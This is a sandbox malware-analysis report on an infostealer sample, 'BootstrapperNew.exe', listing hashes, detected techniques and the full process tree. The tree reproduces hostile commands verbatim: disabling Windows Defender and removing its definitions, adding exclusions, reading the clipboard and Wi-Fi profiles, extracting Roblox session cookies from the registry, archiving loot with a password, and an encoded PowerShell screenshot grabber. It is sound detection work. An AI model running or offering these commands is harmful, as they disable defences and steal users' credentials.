Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-02-2025 02:28

General

  • Target

    BootstrapperNew.exe

  • Size

    10.1MB

  • MD5

    e8e9f56bb9a1d19eb8ef80a0b9040a11

  • SHA1

    6d086704a5e587ab97515e9169534e4ca79d4e74

  • SHA256

    ab743530671df111503d7a56b7f758685e5ac554bbefb5a42c22e8a434c64bf7

  • SHA512

    4e0933e798c7965ab2f0a25c4133035827404b284b2047beaff88a5243b3095cbedd5e28bee8af2bab8bd602ed8c394c9e6c1a4b3874a5688325ccf394d5da1d

  • SSDEEP

    196608:TWl06FT+LYQYMYYBKpYDXcbwO/ikbwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAe:wTQfEHOXcb1inIH20drLYRZjor

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 55 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3208
    • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:984
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3788
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:264
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4972
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3512
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          PID:2480
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ‍ .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3092
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  ‍ .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3832
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2304
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2464
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2424
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4560
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2496
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3816
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2300
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1900
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3344
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:4500
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4544
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3928
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rn2425bf\rn2425bf.cmdline"
                5⤵
                  PID:4756
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC822.tmp" "c:\Users\Admin\AppData\Local\Temp\rn2425bf\CSCDBF5C1098F746209C589BA3A6CE42AA.TMP"
                    6⤵
                      PID:5012
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:4044
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:5020
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                      PID:1312
                      • C:\Windows\system32\attrib.exe
                        attrib -r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:1824
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:980
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4424
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:4152
                            • C:\Windows\system32\attrib.exe
                              attrib +r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:1492
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            3⤵
                              PID:4784
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                4⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2160
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:544
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:2472
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2548
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:1896
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1996
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1376
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:556
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:5012
                                              • C:\Windows\system32\getmac.exe
                                                getmac
                                                4⤵
                                                  PID:4772
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                3⤵
                                                  PID:2044
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1904
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:4960
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3464
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\BdXkM.zip" *"
                                                    3⤵
                                                      PID:3652
                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI32082\rar.exe
                                                        C:\Users\Admin\AppData\Local\Temp\_MEI32082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\BdXkM.zip" *
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:3480
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      3⤵
                                                        PID:4556
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic os get Caption
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3268
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                        3⤵
                                                          PID:3512
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic computersystem get totalphysicalmemory
                                                            4⤵
                                                              PID:556
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            3⤵
                                                              PID:1320
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                4⤵
                                                                  PID:4396
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                3⤵
                                                                  PID:4864
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2424
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                  3⤵
                                                                    PID:2008
